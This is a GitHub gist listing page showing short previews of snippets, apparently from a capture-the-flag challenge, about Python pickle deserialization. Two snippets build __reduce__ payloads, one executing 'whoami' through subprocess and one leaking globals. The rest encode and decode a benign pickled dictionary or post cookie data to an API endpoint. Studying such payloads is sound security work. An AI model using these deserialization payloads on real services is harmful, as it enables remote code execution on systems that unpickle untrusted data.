Skip to content

Instantly share code, notes, and snippets.

View Jonoans's full-sized avatar

Jonoans

16 followers · 49 following
View GitHub Profile
@Jonoans
Jonoans / fun.py
Created June 20, 2020 16:51
import base64
import codecs
import pickle
class RCE(object):
def __reduce__(self):
import subprocess
return (subprocess.check_output, (['whoami'], ) )
class RCEStr(object):
@Jonoans
Jonoans / exploit.py
Created June 20, 2020 15:13
import pickle
import base64
class RCE(object):
def __reduce__(self):
return (globals, () )
class RCEStr(object):
def __reduce__(self):
return (str, (RCE(), ) )
@Jonoans
Jonoans / pickle.py
Created June 20, 2020 15:10
import base64
import pickle
encoded = 'KGRwMApWbmFtZQpwMQpWSmlsbApwMgpzLg=='
pickled = base64.b64decode(encoded)
payload = pickle.loads(pickled)
print(type(payload), payload)
# Outputs: <class 'dict'> {'name': 'Jill'}
@Jonoans
Jonoans / encode.py
Last active June 20, 2020 14:47
import base64
decoded = '''
(dp0
Vname
p1
VJill
p2
s.
'''.strip().encode('utf-8')
@Jonoans
Jonoans / challenge.js
Last active June 20, 2020 11:47
$(document).ready(function() {
var udata = Cookies.get("userdata");
if (typeof udata !== 'undefined') {
var lambda_endpoint = "https://lambda-"
var domain = window.location.hostname
var apigw = lambda_endpoint.concat(domain)
$.ajax({
type: "POST",
url: "https://oo5apsmnc8.execute-api.eu-west-1.amazonaws.com/stag/wx01",
contentType: 'application/json',